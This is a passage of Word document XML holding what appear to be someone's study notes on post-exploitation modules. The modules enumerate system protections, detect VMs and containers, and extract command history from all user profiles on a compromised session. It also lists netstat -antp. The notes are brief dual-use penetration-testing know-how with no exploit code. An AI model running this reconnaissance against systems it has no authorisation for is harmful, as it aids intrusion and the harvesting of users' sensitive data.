        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_protections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D683041" w14:textId="6EB6DBE2" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_protections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72615545" w14:textId="498BA941" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8050AD" w14:textId="0F843CCE" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBB4012" w14:textId="68D2689F" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26905611" w14:textId="2C3BF094" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277366CC" w14:textId="77777777" w:rsidR="002836A1" w:rsidRDefault="002836A1"/>
    <w:p w14:paraId="343B5196" w14:textId="2FF564B5" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF39C3" w14:textId="7CE5C58C" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> important notes placed here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD03299" w14:textId="581DAB51" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002836A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002836A1">
        <w:t>short metadata or textual records stored in the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BFB123" w14:textId="77777777" w:rsidR="002836A1" w:rsidRDefault="002836A1"/>
    <w:p w14:paraId="07537DA5" w14:textId="5B43AF6E" w:rsidR="002836A1" w:rsidRPr="002836A1" w:rsidRDefault="002836A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002836A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> information/</w:t>
      </w:r>
      <w:r w:rsidRPr="002836A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB9E60" w14:textId="1DF25CE7" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19B618C4" w14:textId="731EAA94" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA5679" w14:textId="1BE3BD31" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614D96C" w14:textId="20C8168E" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CEF522" w14:textId="5EE218F5" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53569CEA" w14:textId="77777777" w:rsidR="002836A1" w:rsidRDefault="002836A1"/>
    <w:p w14:paraId="00AF5897" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="58258BEB" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="402D1929" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="17F18CDC" w14:textId="4A370062" w:rsidR="00912540" w:rsidRPr="00912540" w:rsidRDefault="00912540">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># check for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, docker container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B14C772" w14:textId="4562FD75" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkcontainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F240E1B" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="69562030" w14:textId="41EC695B" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Use(gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkcontainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048DAF6A" w14:textId="2A91EDB9" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BA410C" w14:textId="26E8AC6C" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698373C2" w14:textId="3411788D" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F841C" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="6EEDD6B2" w14:textId="35FE5CEE" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t xml:space="preserve">Container </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brackup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (advanced technique)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228137EB" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="4B2BC133" w14:textId="77777777" w:rsidR="002836A1" w:rsidRDefault="002836A1"/>
    <w:p w14:paraId="01996FA8" w14:textId="6D3C6CF0" w:rsidR="00912540" w:rsidRPr="00912540" w:rsidRDefault="00912540">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="008258A8" w14:textId="081804E1" w:rsidR="00912540" w:rsidRDefault="00912540" w:rsidP="00912540">
      <w:r>
        <w:t>Use(gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:t>vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF910B" w14:textId="593E77AB" w:rsidR="00912540" w:rsidRDefault="00912540" w:rsidP="00912540">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26951837" w14:textId="614F3B38" w:rsidR="00912540" w:rsidRDefault="00912540" w:rsidP="00912540">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58158E17" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540" w:rsidP="00912540"/>
    <w:p w14:paraId="1F1DB416" w14:textId="2637C389" w:rsidR="00912540" w:rsidRPr="00912540" w:rsidRDefault="00912540" w:rsidP="00912540">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checkcontainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912540">
        <w:t xml:space="preserve"> = tests whether the process/host is running </w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inside a container</w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:t xml:space="preserve"> (Docker, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912540">
        <w:t>Podman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912540">
        <w:t>, Kubernetes, LXC, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519268A3" w14:textId="7D9708C1" w:rsidR="00912540" w:rsidRPr="00912540" w:rsidRDefault="00912540" w:rsidP="00912540">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912540">
        <w:t xml:space="preserve"> = tests whether the host is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>virtual machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00912540">
        <w:t xml:space="preserve"> (Hyper-V, VMware, VirtualBox, KVM, Xen, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BF6B6E" w14:textId="78C51B57" w:rsidR="00912540" w:rsidRDefault="00912540" w:rsidP="00912540"/>
    <w:p w14:paraId="31B9F7BC" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="0D1560CE" w14:textId="1D5493ED" w:rsidR="00AE05CC" w:rsidRDefault="00AE05CC">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE05CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE05CC">
        <w:t xml:space="preserve">Enumerates and extracts shell/command-history artifacts (PowerShell, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE05CC">
        <w:t>PSReadLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE05CC">
        <w:t>, cmd/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE05CC">
        <w:t>doskey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE05CC">
        <w:t xml:space="preserve">, etc.) from </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE05CC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all user profiles on the currently used host</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE05CC">
        <w:t>, revealing recent user activity and possible sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C9095" w14:textId="78B58DE4" w:rsidR="00912540" w:rsidRPr="00912540" w:rsidRDefault="00912540">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_users_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0503F0D7" w14:textId="4BD68FE7" w:rsidR="002836A1" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_users_histroy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D0FE5A" w14:textId="40597410" w:rsidR="00CD0407" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED08B7" w14:textId="5B11CE1E" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D76E4BC" w14:textId="1C238987" w:rsidR="00912540" w:rsidRDefault="00912540">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6060827F" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540"/>
    <w:p w14:paraId="319BF8EA" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="3863A193" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="18357713" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="06AE7441" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="6E44CDF1" w14:textId="4FA42673" w:rsidR="002836A1" w:rsidRPr="00912540" w:rsidRDefault="002836A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00912540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48078C08" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407" w:rsidP="00CD0407">
      <w:r>
        <w:t>Netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38B4B1E1" w14:textId="7051AD31" w:rsidR="002836A1" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t># services listing on the open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B851960" w14:textId="77777777" w:rsidR="00912540" w:rsidRDefault="00912540" w:rsidP="00912540">
      <w:r>
        <w:t>Bash history file contains the commands that the user run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67D939" w14:textId="77777777" w:rsidR="002836A1" w:rsidRDefault="002836A1"/>
    <w:sectPr w:rsidR="002836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DC8"/>
    <w:rsid w:val="002836A1"/>
    <w:rsid w:val="002A1262"/>
    <w:rsid w:val="003960CA"/>
    <w:rsid w:val="00492156"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00557A50"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00653127"/>
    <w:rsid w:val="00733B8C"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00912540"/>
    <w:rsid w:val="00A70B7A"/>
    <w:rsid w:val="00AE05CC"/>
    <w:rsid w:val="00BB1311"/>
    <w:rsid w:val="00CA2DC8"/>
    <w:rsid w:val="00CD0407"/>
    <w:rsid w:val="00D63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800C9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE3FFE7F-53FA-44CE-9BDF-289C882C0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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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D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DC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1254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7</Pages>
  <Words>343</Words>
  <Characters>2489</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>177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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-17T05:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T06:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>